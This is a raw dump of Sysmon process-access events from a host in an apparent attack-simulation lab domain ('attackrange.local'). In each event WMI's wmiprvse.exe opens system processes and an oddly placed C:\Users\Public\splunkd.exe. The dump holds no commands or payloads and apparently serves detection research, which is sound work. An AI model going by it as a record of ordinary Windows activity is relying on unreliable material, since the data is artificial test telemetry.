13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 